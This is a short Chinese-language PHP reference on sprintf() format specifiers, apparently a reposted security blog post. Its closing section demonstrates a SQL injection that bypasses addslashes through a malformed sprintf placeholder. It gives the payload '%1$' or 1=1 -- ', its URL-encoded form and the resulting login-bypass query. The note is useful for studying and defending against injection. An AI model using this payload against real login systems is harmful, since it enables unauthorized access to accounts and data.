sprintf()
定義和用法
format引數
可能的格式值:
%% - 回傳一個百分號 %
%b - 二進制數
%c - ASCII 值對應的字符
%d - 包含正負號的十進制數(負數、0、正數)
%e - 使用小寫的科學計數法(例如 1.2e+2)
%E - 使用大寫的科學計數法(例如 1.2E+2)
%u - 不包含正負號的十進制數(大于等于 0)
%f - 浮點數(本地設定)
%F - 浮點數(非本地設定)
%g - 較短的 %e 和 %f
%G - 較短的 %E 和 %f
%o - 八進制數
%s - 字串
%x - 十六進制數(小寫字母)
%X - 十六進制數(大寫字母)
附加的格式值,必需放置在 % 和字母之間(例如 %.2f):
+ (在數字前面加上 + 或 - 來定義數字的正負性,默認情況下,只有負數才做標記,正數不做標記)
' (規定使用什么作為填充,默認是空格,它必須與寬度指定器一起使用,例如:%'x20s(使用 "x" 作為填充))
- (左調整變數值)
[0-9] (規定變數值的最小寬度)
.[0-9] (規定小數位數或最大字串長度)
注釋:如果使用多個上述的格式值,它們必須按照以上順序使用,
bug(特定情況)
$pass=sprintf("and pass='%s'",addslashes("%1$' or 1=1 -- "));
$sql=sprintf("select * from user where name='%s' $pass",addslashes("root"));
// 輸出:select * from user where name='root' and pass='' or 1=1 -- '
%1$' or 1=1 -- 用addslashes加上反斜杠之后%1$\' or 1=1 --
%1$\就是不正常的形式在第二行代碼中被替換成空留下' or 1=1 --
%1$' or 1=1 -- 最好用URL編碼一下
%251%24%27+or+1%3D1+--+
原因
??當format引數字串中無法形成正常的%占位符時,回傳值中不是正常形式%占位符將會替換成空
??形成不正常的占位符有很多種情況不按照format引數的可能格式和附加格式使用基本都是不正常的形式
??注入程序中根據情況進行構造
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/531847.html
標籤:訊息安全